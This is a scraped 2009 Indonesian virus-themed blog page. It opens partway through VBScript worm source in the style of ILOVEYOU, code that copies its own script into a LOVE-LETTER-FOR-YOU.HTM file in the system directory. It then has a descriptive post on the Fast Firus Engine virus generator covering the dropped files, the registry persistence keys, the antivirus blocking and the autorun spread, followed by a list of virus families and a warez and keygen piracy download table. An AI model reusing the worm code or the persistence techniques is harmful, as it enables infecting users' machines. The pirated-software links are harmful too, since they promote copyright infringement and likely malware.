/>dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/") <br />dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\") <br />dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'") <br />dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""") <br />dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/") <br />dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\") <br />set fso=CreateObject("Scripting.FileSystemObject") <br />set c=fso.OpenTextFile(WScript.ScriptFullName,1) <br />lines=Split(c.ReadAll,vbcrlf) <br />l1=ubound(lines) <br />for n=0 to ubound(lines) <br />lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91)) <br />lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93)) <br />lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37)) <br />if (l1=n) then <br />lines(n)=chr(34)+lines(n)+chr(34) <br />else <br />lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _" <br />end if <br />next <br />set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM") <br />b.close <br />set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2) <br />d.write dt5 <br />d.write join(lines,vbcrlf) <br />d.write vbcrlf <br />d.write dt6 <br />d.close <br />end sub <br /></pre> <div style='clear: both;'></div> </p> <div class='endline'></div> <p class='commentline'> <a href='https://www.blogger.com/comment.g?blogID=1518176830031402701&postID=1431121314037691059&isPopup=true' onclick='javascript:window.open(this.href, "bloggerPopup", "toolbar=0,location=0,statusbar=1,menubar=0,scrollbars=yes,width=640,height=500"); return false;'>Read Users' Comments (0)</a> </p> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> </div> <div class='post-footer-line post-footer-line-2'> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> <div class='post-bottom'></div> <div class='endline'></div> <div class='post-top'></div> <div class='post'> <a name='7319503750550980249'></a> <h2> <a href='http://jangkrikvirusdago.blogspot.com/2009/10/bikin-virus-dalam-sekejap-masih-ingat.html'>bikin virus dlm sekejap</a> </h2> <p class='postmetadata'> Posted in | 18.02 </p> <div class='entry'> <p> <span style="color: rgb(51, 255, 255);">bikin virus dalam sekejap!!!!!!!</span><br /><br /><div style="text-align: justify; color: rgb(51, 255, 255);"><em>Masih ingat dengan <span style="border-bottom: 1px solid rgb(0, 153, 0); text-decoration: underline; font-weight: 400; font-style: italic;font-family:Arial,Sans-erif;font-size:12px;" >virus</span> Aksika? Virus “open source” <span style="border-bottom: 1px solid rgb(0, 153, 0); text-decoration: underline; font-weight: 400; font-style: italic;font-family:Arial,Sans-erif;font-size:12px;" >yang</span> satu itu memang memiliki banyak sekali varian. Tidak heran karena source code-nya memang disedia kan bebas di Internet, jadi siapapun dapat dengan mudah mengubah <span style="border-bottom: 1px solid rgb(0, 153, 0); text-decoration: underline; font-weight: 400; font-style: italic;font-family:Arial,Sans-erif;font-size:12px;" >dan</span> meng-compile source code-nya dan jadilah varian <span style="border-bottom: 1px solid rgb(0, 153, 0); text-decoration: underline; font-weight: 400; font-style: italic;font-family:Arial,Sans-erif;font-size:12px;" >baru</span>.</em></div> <p style="text-align: justify; color: rgb(51, 255, 255);">Berawal dari kemudahan itulah, banyak virus maker ataupun programer pemula mencoba–coba untuk membuat virus tanpa perlu repot. Paling yang dibutuhkan hanyalah pengetahuan seputar <span style="border-bottom: 1px solid rgb(0, 153, 0); text-decoration: underline; font-weight: 400; font-style: normal;font-family:Arial,Sans-erif;font-size:12px;" >operating system</span> dan programming.</p> <p style="text-align: justify; color: rgb(51, 255, 255);">Namun kemudahan itu belum seberapa, bila dibandingkan dengan menggunakan <span style="border-bottom: 1px solid rgb(0, 153, 0); text-decoration: underline; font-weight: 400; font-style: normal;font-family:Arial,Sans-erif;font-size:12px;" >program</span> Virus <span style="border-bottom: 1px solid rgb(0, 153, 0); text-decoration: underline; font-weight: 400; font-style: normal;font-family:Arial,Sans-erif;font-size:12px;" >Generator</span>. Dari namanya saja, kita sudah dapat mengira kegunaan dari program tersebut. Ya, Virus Generator merupakan program untuk dapat membuat virus secara mudah dan instan.</p> <p style="text-align: justify; color: rgb(51, 255, 255);">Bermula dari sampel sebuah virus yang lumayan banyak dikirimkan oleh pembaca kepada kami. PC Media Antivirus mengenalnya dengan nama Gen.FFE-Fajar, namun antivirus lain ada <span style="border-bottom: 1px solid rgb(0, 153, 0); text-decoration: underline; font-weight: 400; font-style: normal;font-family:Arial,Sans-erif;font-size:12px;" >juga</span> yang menyebutnya dengan nama Brontok.D. Dengan penyelidikan sederhana akhirnya diketahui bahwa virus tersebut dibuat menggunakan Virus Generator.</p> <p style="text-align: justify; color: rgb(51, 255, 255);"><strong>Fast Firus <span style="border-bottom: 1px solid rgb(0, 153, 0); text-decoration: underline; font-style: normal;font-family:Arial,Sans-erif;font-size:12px;" >Engine</span> (FFE)</strong><br />Pembuat Generator tersebut menamakan program buatannya itu dengan nama Fast Firus Engine. Seperti yang terlihat pada program ataupun situs pembuatnya, ia memberitahukan bahwa program ini hanya untuk tujuan pembelajaran dan tidak untuk tindakan merusak. Namun tetap saja, bila program ini sudah jatuh ke tangan yang salah, pasti akan digunakan untuk pengrusakan.</p> <p style="text-align: justify; color: rgb(51, 255, 255);">Virus Generator ini dibuat menggunakan bahasa <span style="border-bottom: 1px solid rgb(0, 153, 0); text-decoration: underline; font-weight: 400; font-style: normal;font-family:Arial,Sans-erif;font-size:12px;" >Visual Basic</span> dan di-compress menggunakan packer tELock. Dalam paketnya terdapat dua buah file, yakni Fast Firus Engine.exe dan data.ex_. Fast Firus Engine. exe merupakan program utama dalam pembuatan virusnya dan sementara file data.ex_ sebenarnya merupakan badan virus asli yang belum dimodifi kasi.</p> <p style="text-align: justify; color: rgb(51, 255, 255);">Saat file Fast Firus Engine.exe dijalankan, maka pengguna akan dihadapkan pada sebuah interface. Anda hanya disuruh mengisikan nama virus, nama pembuat, dan pesan-pesannya. Lalu dengan menekan tombol Generate, maka jadilah virus Anda.</p> <p style="text-align: justify; color: rgb(51, 255, 255);">Cara kerja dari Generator tersebut sebenarnya sangat sederhana. Ia hanya menambahkan data yang Anda masukkan tadi ke bagian akhir file virus asli (data.ex_). Nantinya informasi tersebut digunakan oleh virus dalam proses infeksi.</p> <p style="text-align: justify; color: rgb(51, 255, 255);"><strong>Bagaimana Virus Menginfeksi?</strong><br />Virus hasil ciptaan FFE memang terlihat sederhana. Sama seperti Generatornya, ia juga dibuat menggunakan bahasa Visual Basic yang di-compile dengan metode Native- Code. Lalu di compress menggunakan tELock agar ukurannya semakin kecil. Virus ini memiliki ukuran tubuh asli sebesar 55.296 bytes.</p> <p style="text-align: justify; color: rgb(51, 255, 255);">Saat virus kali pertama dieksekusi, ia akan membuat beberapa file induk di beberapa lokasi. Seperti di direktori \%WINDOWS%\, akan terdapat file dengan nama.exe, Win32 exe, activex.exe, dan %virusname% (nama virus sesuai yang diisikan oleh sang pembuatnya pada Generator). Di \%WINDOWS%\ %system32%\ akan terdapat file copy.pif, _default.pif, dan surif.bin. Selain itu, ia juga mengubah atau membuat file Oeminfo.ini yang merupakan bagian dari <span style="border-bottom: 1px solid rgb(0, 153, 0); text-decoration: underline; font-weight: 400; font-style: normal;font-family:Arial,Sans-erif;font-size:12px;" >System Properties</span>. Jadi apabila komputer Anda terinfeksi oleh virus hasil generate dari FFE, maka pada System Properties akan terdapat tulisan “Generated by Fast Firus Engine”.</p> <p style="text-align: justify; color: rgb(51, 255, 255);">Di direktori \%WINDOWS%\%System%\ akan terdapat beberapa file induk lagi yang menggunakan nama yang sama seperti file system milik Windows, seperti csrss.exe, winlogon.exe, lsass.exe, smss.exe, svchost. exe, dan winlogon.exe.</p> <p style="text-align: justify; color: rgb(51, 255, 255);">Dan tak lupa, pada root drive pun akan terdapat file dengan nama “baca euy.txt” yang berisikan pesan–pesan dari si pembuat virus. Jadi pada saat membuat virus dengan menggunakan Generator tersebut, maka pembuatnya akan disuguhkan beberapa kotak input, seperti Author of the virus, Name of the virus, dan Messages. Nah, isi dari kotak messages ini yang nantinya ditampilkan pada file “baca euy.txt” tersebut.</p> <p style="text-align: justify; color: rgb(51, 255, 255);">Setelah virus berhasil meng-copy-kan file induknya ke dalam sistem tersebut, ia akan menjalankan file induk tadi, sehingga pada memory akan terdapat beberapa process virus, seperti csrss.exe, winlogon.exe, lsass. exe, smss.exe, svchost.exe, dan winlogon.exe. Nama process yang mirip dengan process/services milik Windows tersebut mungkin sengaja untuk mengecoh user. Untuk membedakannya, Anda dapat melihat path atau lokasi process tersebut dijalankan. Process virus ini biasanya berjalan di direktori System sementara process/services milik Windows yang running biasanya berasal dari direktori System32.</p> <p style="text-align: justify; color: rgb(51, 255, 255);"><strong>Mengubah Registry</strong><br />Virus ini menambahkan beberapa item startup pada registry agar pada saat memulai Windows ia dapat running secara otomatis atau untuk mengubah setting-an Windows agar sesuai keinginannya. Informasi mengenai registry yang diubahnya tidak akan dapat dengan mudah kita lihat karena dalam kondisi terenkripsi.</p> <p style="text-align: justify; color: rgb(51, 255, 255);">Yang ia ubah adalah seperti nilai dari item Userinit, yakni dengan menambahkan parameter ke file induk. Pada key HKEY_CURRENT_ USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load juga akan diubah itemnya agar mengarah ke file induknya dengan nama Activex.exe. Pada HKEY_CURRENT_USER \Software\Microsoft\ Windows\CurrentVersion\Run\ akan terdapat item baru dengan nama present. Key HKEY_ LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run\ akan terdapat item baru juga dengan nama Default dan %username%, username di sini merupakan nama user yang sedang aktif saat itu.</p> <p style="text-align: justify; color: rgb(51, 255, 255);">Virus hasil generate dari FFE juga mengubah shell extension untuk file .exe, yakni dengan mengubah type information dari Application menjadi File Folder. Setting-an folder Options juga diubah agar tidak menampilkan extension dan setiap fi le dengan attribut hidden. Dan agar dapat aktif pada safe-mode, ia pun mengubah nilai dari item SafeBoot.</p> <p style="text-align: justify; color: rgb(51, 255, 255);">Dengan menggunakan bantuan registry Image File Execution Options, virus ini juga menambahkan item baru pada section tersebut dengan nama cmd.exe, msconfi g.exe, regedit.exe, dan taskmgr.exe. Maksudnya adalah agar setiap user yang mengakses program dengan nama file seperti itu, maka akan di-bypass oleh Windows dan dialihkan ke file induk si virus.</p> <p style="text-align: justify; color: rgb(51, 255, 255);"><strong>Bagaimana Virus Menyebar?</strong><br />Virus ini dapat menyebar melalui media penyimpan data seperti <span style="border-bottom: 1px solid rgb(0, 153, 0); text-decoration: underline; font-weight: 400; font-style: normal;font-family:Arial,Sans-erif;font-size:12px;" >flash disk</span>. Saat Anda mencolokkan flash disk pada komputer yang terinfeksi, maka pada flash disk tersebut akan terdapat beberapa file baru, seperti explorer.exe, %virusname%.exe, dan msvbvm60.dll. Juga beberapa file pendukung seperti desktop.ini, autorun.inf agar ia dapat running otomatis pada saat mengakses flash disk tersebut.</p> <p style="text-align: justify; color: rgb(51, 255, 255);">File virus lainnya pun disimpan pada direktori baru di flash disk tersebut dengan nama Recycled yang berisikan file Firus.pif dan Folder.htt. Kesemua file virus tersebut dalam kondisi hidden sehingga tidak terlihat.</p> <p style="text-align: justify; color: rgb(51, 255, 255);"><strong>Virus Beraksi</strong><br />Untuk dapat bertahan hidup, virus ini pun akan mencoba untuk memblok setiap program yang tidak ia inginkan seperti tools atau program antivirus termasuk PCMAV. Sama seperti halnya data registry yang diubah, data mengenai program apa saja yang diblok olehnya juga terdapat dalam tubuhnya dalam kondisi terenkripsi.</p> <p style="text-align: justify; color: rgb(51, 255, 255);">Jadi, saat virus sudah stay di memory, ia akan memonitor setiap program yang diakses oleh user, yakni dengan membaca nama file dan juga caption Window. Beberapa nama file antivirus yang dicoba untuk dibloknya adalah nav.exe, avgcc.exe, njeeves.exe, ccapps.exe, ccapp.exe, kav.exe, nvcoas.exe, avp32.exe, dan masih banyak lagi yang lainnya. Termasuk beberapa program setup atau installer juga tidak dapat dijalankan pada komputer terinfeksi.</p> <p style="color: rgb(51, 255, 255);"><strong>Pencegahan dan Penanggulangan</strong><br />PC Media Antivirus RC19 ini dapat membersihkan komputer terinfeksi secara tuntas dan akurat 100% setiap virus yang dibuat dengan menggunakan Fast Firus Generator. Untuk menghindari aksi blok oleh virus terhadap PCMAV, silakan Anda rename terlebih dahulu file PCMAV misalnya PCMAV-CLN.EXE menjadi MERDEKA.EXE.</p> <div style='clear: both;'></div> </p> <div class='endline'></div> <p class='commentline'> <a href='https://www.blogger.com/comment.g?blogID=1518176830031402701&postID=7319503750550980249&isPopup=true' onclick='javascript:window.open(this.href, "bloggerPopup", "toolbar=0,location=0,statusbar=1,menubar=0,scrollbars=yes,width=640,height=500"); return false;'>Read Users' Comments (0)</a> </p> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> </div> <div class='post-footer-line post-footer-line-2'> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> <div class='post-bottom'></div> <div class='endline'></div> <div class='post-top'></div> <div class='post'> <a name='4581430198445554695'></a> <h2> <a href='http://jangkrikvirusdago.blogspot.com/2009/10/macam-virus-komputer.html'>Macam Virus KOMPUTER</a> </h2> <p class='postmetadata'> Posted in | 17.45 </p> <div class='entry'> <p> <table style="color: rgb(51, 255, 51);" border="0" cellpadding="4" cellspacing="0"><tbody><tr><td width="596" valign="top"><p align="center"><span style=";font-family:Verdana,Arial,Helvetica,sans-serif;font-size:100%;" ><b>Macam-macam Virus Komputer <br /></b></span> </p> <!--/area Type="subhead"--> </td> </tr> <tr> <td width="592" height="20"><img alt="" height="20" src="http://alamo432.tripod.com/imagelib/sitebuilder/layout/spacer.gif" /></td> </tr> <tr> <td valign="top"> <table border="0" cellpadding="2" cellspacing="0"> <tbody><tr> <td width="592" valign="top"> <!--area Type="main" style="0;font-family:Arial,Helvetica,sans-serif;font-size:85%;color:black;"--> <p align="left"><span style=";font-family:Verdana,Arial,Helvetica,sans-serif;font-size:85%;" ><b><b>Virus Bagle.BC</b><br /> <br />Virus Bagle BC ini termasuk salah satu jenis virus yang berbahaya dan telah masuk peringkat atas jenis virus yang paling cepat mempengaruhi komputer kita. Beberapa jam sejak keluarnya virus ini, sudah terdapat 2 buah varian Bagle ( Bagle BD dan BE )yang menyebar melalui e-mail, jaringan komputer dan aplikasi P2P. Virus ini menyebar melalui e-mail dengan berbagai subyek berbeda. Menurut suatu penelitian dari Panda Software virus Bagle BC ini menyusup ke dalam e-mail dengan subyek antara lain : Re:, Re:Hello, Re:Hi, Re:Thank you, Re:Thanks. Attachment-nya juga bermacam-macam, antara lain : .com, .cpl, .exe, .scr. Virus Bagle BC juga mampu untuk menghentikan kerja program-program antivirus.<br /> <br /> <br /> <b>Backdoor Alnica</b><br /> <br />Virus yang juga berbahaya ini merupakan salah satu tipe virus Trojan Horse. Merupakan salah satu virus backdoor yang jika berhasil menginfeksi komputer akan mampu melakukan akses dari jarak jauh dan mengambil segala informasi yang diinginkan oleh si penyerang. Sistem operasi yang diserang oleh virus tersebut antara lain : Windows 200, Windows 95, Windows 98, Windows Me, Windows NT dan Windows XP. Virus ini berukuran sebesar 57.856 byte.<br /> <br /> <br /> <b> Trojan di Linux</b><br /> <br />Para pengguna linux Red Hat diharapkan untuk berhati-hati terhadap PATCH yang dikirm melalui e-mail dengan alamat "security@redhat.com" karena itu sebenarnya bukannya patch security tetapi virus Trojan yang bisa mengacaukan sistem keamanan. E-mail peringatan dari Red Hat biasanya selalu dikirim dari alamat "secalert@redhat.com" dan ditandatangani secara digital. Virus ini juga pernah menyerang sistem keamanan Windows tahun 2003 dengan subyek menawarkan solusi keamanan.</b></span></p></td></tr></tbody></table></td></tr></tbody></table> <div style='clear: both;'></div> </p> <div class='endline'></div> <p class='commentline'> <a href='https://www.blogger.com/comment.g?blogID=1518176830031402701&postID=4581430198445554695&isPopup=true' onclick='javascript:window.open(this.href, "bloggerPopup", "toolbar=0,location=0,statusbar=1,menubar=0,scrollbars=yes,width=640,height=500"); return false;'>Read Users' Comments (0)</a> </p> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> </div> <div class='post-footer-line post-footer-line-2'> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> <div class='post-bottom'></div> <div class='endline'></div> <div class='post-top'></div> <div class='post'> <a name='5472637097715571210'></a> <h2> <a href='http://jangkrikvirusdago.blogspot.com/2009/07/all-keygen.html'>all keygen</a> </h2> <p class='postmetadata'> Posted in | 19.22 </p> <div class='entry'> <p> <div class="header"> <div> <a href="http://www.ddlspot.com/" title="Bookmark Us" rel="sidebar" onclick="if(document.all && !window.opera){ window.external.AddFavorite('http://www.ddlspot.com', 'DDLSpot Warez Downloads');return false; }else{ this.title = 'DDLSpot Warez Downloads'; }"><img alt="Bookmark" class="bookmark" src="http://www.ddlspot.com/images/button-bookmark.jpg" /></a> </div> <form action="/search.php" method="get" class="form"> <input name="q" class="searchbar" onclick="this.value='';" value="Please enter your search terms here..." type="text"> <input name="log" value="1" type="hidden"> <input src="http://www.ddlspot.com/images/button-search.jpg" alt="Search" class="search" type="image"> </form> <ul class="menu"><li class="active"><a href="http://www.ddlspot.com/" title="Home">Home</a></li><li><a href="http://www.ddlspot.com/download/software/" title="Software">Software</a></li><li><a href="http://www.ddlspot.com/download/games/" title="Games">Games</a></li><li><a href="http://www.ddlspot.com/download/movies/" title="Movies">Movies</a></li><li><a href="http://www.ddlspot.com/download/music/" title="Music">Music</a></li><li><a href="http://www.serialshack.com/" title="Serials" target="_blank">Serials</a></li><li><a href="http://www.ddlspot.com/download/plugins/" title="Plugins">Plugins</a></li><li class="end"><a href="http://www.ddlspot.com/webmasters/" title="Webmasters">Webmasters</a></li></ul> </div> <div class="fill"> <table summary="Download Results" class="content"> <thead> <tr class="headings"><th class="c1" scope="col">Date</th><th class="c2" scope="col">Download Title</th><th class="c3" scope="col">Search</th><th class="c4" scope="col">Type</th><th class="c5" scope="col">Hits</th></tr> </thead> <tbody> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/transformers-2-revenge-of-the-fallen-download-76289.html" rel="nofollow" title="Transformers 2 Revenge Of The Fallen" target="_blank">Transformers 2 Revenge Of The Fallen</a></td><td><a href="http://www.ddlspot.com/transformers-2-revenge-of-the-fallen-crack-serial-keygen-warez-download.html" title="Transformers 2 Revenge Of The Fallen Keygen">Keygen</a></td><td>Game</td><td>29</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/the-sims-3-download-76288.html" rel="nofollow" title="The Sims 3" target="_blank">The Sims 3</a></td><td><a href="http://www.ddlspot.com/the-sims-3-crack-serial-keygen-warez-download.html" title="The Sims 3 Serial">Serial</a></td><td>Game</td><td>173</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/rar-password-recovery-1.1-rc-16-download-76287.html" rel="nofollow" title="RAR Password Recovery 1.1 RC 16" target="_blank">RAR Password Recovery 1.1 RC 16</a></td><td><a href="http://www.ddlspot.com/rar-password-recovery-1.1-rc-16-crack-serial-keygen-warez-download.html" title="RAR Password Recovery 1.1 RC 16 Serial">Warez</a></td><td>App</td><td>18</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/advanced-system-cleaner-1.8.1-download-76286.html" rel="nofollow" title="Advanced System Cleaner 1.8.1" target="_blank">Advanced System Cleaner 1.8.1</a></td><td><a href="http://www.ddlspot.com/advanced-system-cleaner-1.8.1-crack-serial-keygen-warez-download.html" title="Advanced System Cleaner 1.8.1 Warez">Warez</a></td><td>App</td><td>2</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/va-zaum-vol.-1-2009-download-76285.html" rel="nofollow" title="VA: Zaum Vol. 1-2009" target="_blank">VA: Zaum Vol. 1-2009</a></td><td><a href="http://www.ddlspot.com/va-zaum-vol.-1-2009-crack-serial-keygen-warez-download.html" title="VA: Zaum Vol. 1-2009 Keygen">Keygen</a></td><td>Music</td><td>7</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/excel-for-teachers-inc.-exercises-download-76284.html" rel="nofollow" title="Excel For Teachers: Inc. Exercises" target="_blank">Excel For Teachers: Inc. Exercises</a></td><td><a href="http://www.ddlspot.com/excel-for-teachers-inc.-exercises-crack-serial-keygen-warez-download.html" title="Excel For Teachers: Inc. Exercises Serial">Serial</a></td><td>eBook</td><td>8</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/keeptool-8.1.7.6-download-76283.html" rel="nofollow" title="KeepTool 8.1.7.6" target="_blank">KeepTool 8.1.7.6</a></td><td><a href="http://www.ddlspot.com/keeptool-8.1.7.6-crack-serial-keygen-warez-download.html" title="KeepTool 8.1.7.6 Serial">Crack</a></td><td>App</td><td>1</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/apple-quicktime-pro-7.62.14.0-download-76282.html" rel="nofollow" title="Apple QuickTime Pro 7.62.14.0" target="_blank">Apple QuickTime Pro 7.62.14.0</a></td><td><a href="http://www.ddlspot.com/apple-quicktime-pro-7.62.14.0-crack-serial-keygen-warez-download.html" title="Apple QuickTime Pro 7.62.14.0 Crack">Crack</a></td><td>App</td><td>10</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/e.m.-powerpoint-video-converter-2.41-download-76281.html" rel="nofollow" title="E.M. PowerPoint Video Converter 2.41" target="_blank">E.M. PowerPoint Video Converter 2.41</a></td><td><a href="http://www.ddlspot.com/e.m.-powerpoint-video-converter-2.41-crack-serial-keygen-warez-download.html" title="E.M. PowerPoint Video Converter 2.41 Torrent">Torrent</a></td><td>App</td><td>10</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/dead-disk-doctor-1.26-download-76280.html" rel="nofollow" title="Dead Disk Doctor 1.26" target="_blank">Dead Disk Doctor 1.26</a></td><td><a href="http://www.ddlspot.com/dead-disk-doctor-1.26-crack-serial-keygen-warez-download.html" title="Dead Disk Doctor 1.26 Keygen">Keygen</a></td><td>App</td><td>10</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/winwatermark-business-edition-2.9.2-download-76279.html" rel="nofollow" title="WinWatermark Business Edition 2.9.2" target="_blank">WinWatermark Business Edition 2.9.2</a></td><td><a href="http://www.ddlspot.com/winwatermark-business-edition-2.9.2-crack-serial-keygen-warez-download.html" title="WinWatermark Business Edition 2.9.2 Keygen">Serial</a></td><td>App</td><td>6</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/winrar-3.71-download-76278.html" rel="nofollow" title="WinRAR 3.71" target="_blank">WinRAR 3.71</a></td><td><a href="http://www.ddlspot.com/winrar-3.71-crack-serial-keygen-warez-download.html" title="WinRAR 3.71 Serial">Crack</a></td><td>App</td><td>24</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/adarian-money-v5.0.2330-download-76277.html" rel="nofollow" title="Adarian Money v5.0.2330" target="_blank">Adarian Money v5.0.2330</a></td><td><a href="http://www.ddlspot.com/adarian-money-v5.0.2330-crack-serial-keygen-warez-download.html" title="Adarian Money v5.0.2330 Crack">Crack</a></td><td>App</td><td>2</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/icon-workshop-6.31-download-76276.html" rel="nofollow" title="Icon WorkShop 6.31" target="_blank">Icon WorkShop 6.31</a></td><td><a href="http://www.ddlspot.com/icon-workshop-6.31-crack-serial-keygen-warez-download.html" title="Icon WorkShop 6.31 Torrent">Torrent</a></td><td>App</td><td>1</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/cyberlink-powerdirector-ultra-v7.00.1628-download-76275.html" rel="nofollow" title="Cyberlink PowerDirector Ultra v7.00.1628" target="_blank">Cyberlink PowerDirector Ultra v7.00.1628</a></td><td><a href="http://www.ddlspot.com/cyberlink-powerdirector-ultra-v7.00.1628-crack-serial-keygen-warez-download.html" title="Cyberlink PowerDirector Ultra v7.00.1628 Serial">Serial</a></td><td>App</td><td>29</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/sex-is-comedy-2002-hollywood-download-76274.html" rel="nofollow" title="Sex Is Comedy 2002 Hollywood" target="_blank">Sex Is Comedy 2002 Hollywood</a></td><td><a href="http://www.ddlspot.com/sex-is-comedy-2002-hollywood-crack-serial-keygen-warez-download.html" title="Sex Is Comedy 2002 Hollywood Serial">Warez</a></td><td>Movie</td><td>900</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/dream-pinball-3d-download-76273.html" rel="nofollow" title="Dream Pinball 3D" target="_blank">Dream Pinball 3D</a></td><td><a href="http://www.ddlspot.com/dream-pinball-3d-crack-serial-keygen-warez-download.html" title="Dream Pinball 3D Warez">Warez</a></td><td>Game</td><td>30</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/world-snooker-championship-download-76272.html" rel="nofollow" title="World Snooker Championship" target="_blank">World Snooker Championship</a></td><td><a href="http://www.ddlspot.com/world-snooker-championship-crack-serial-keygen-warez-download.html" title="World Snooker Championship Torrent">Torrent</a></td><td>Game</td><td>19</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/golds-gym-cardio-workout-usa-wii-download-76271.html" rel="nofollow" title="Golds Gym Cardio Workout USA WII" target="_blank">Golds Gym Cardio Workout USA WII</a></td><td><a href="http://www.ddlspot.com/golds-gym-cardio-workout-usa-wii-crack-serial-keygen-warez-download.html" title="Golds Gym Cardio Workout USA WII Keygen">Keygen</a></td><td>Game</td><td>5</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/disney-think-fast-wii-download-76270.html" rel="nofollow" title="Disney Think Fast WII" target="_blank">Disney Think Fast WII</a></td><td><a href="http://www.ddlspot.com/disney-think-fast-wii-crack-serial-keygen-warez-download.html" title="Disney Think Fast WII Keygen">Crack</a></td><td>Game</td><td>12</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/mushroom-men-the-spore-war-wii-download-76269.html" rel="nofollow" title="Mushroom Men The Spore War Wii" target="_blank">Mushroom Men The Spore War Wii</a></td><td><a href="http://www.ddlspot.com/mushroom-men-the-spore-war-wii-crack-serial-keygen-warez-download.html" title="Mushroom Men The Spore War Wii Crack">Crack</a></td><td>Game</td><td>6</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/cate-west-the-vanishing-files-usa-wii-download-76268.html" rel="nofollow" title="Cate West The Vanishing Files Usa Wii" target="_blank">Cate West The Vanishing Files Usa Wii</a></td><td><a href="http://www.ddlspot.com/cate-west-the-vanishing-files-usa-wii-crack-serial-keygen-warez-download.html" title="Cate West The Vanishing Files Usa Wii Crack">Crack</a></td><td>Game</td><td>5</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/augie-march-moo-you-bloody-choir-download-76267.html" rel="nofollow" title="Augie March: Moo you Bloody Choir" target="_blank">Augie March: Moo you Bloody Choir</a></td><td><a href="http://www.ddlspot.com/augie-march-moo-you-bloody-choir-crack-serial-keygen-warez-download.html" title="Augie March: Moo you Bloody Choir Keygen">Keygen</a></td><td>Music</td><td>3</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/pink-funhouse-download-76266.html" rel="nofollow" title="Pink: Funhouse" target="_blank">Pink: Funhouse</a></td><td><a href="http://www.ddlspot.com/pink-funhouse-crack-serial-keygen-warez-download.html" title="Pink: Funhouse Keygen">Keygen</a></td><td>Music</td><td>6</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td class="i">25-07-2009</td><td class="b"><a href="http://www.ddlspot.com/transformers-revenge-of-the-fallen-download-76265.html" rel="nofollow" title="Transformers: Revenge Of The Fallen" target="_blank">Transformers: Revenge Of The Fallen</a></td><td><a href="http://www.ddlspot.com/transformers-revenge-of-the-fallen-crack-serial-keygen-warez-download.html" title="Transformers: Revenge Of The Fallen Keygen">Keygen</a></td><td>Music</td><td>19</td></tr><tr><td class="d" colspan="5"><br /></td></tr> <tr><td 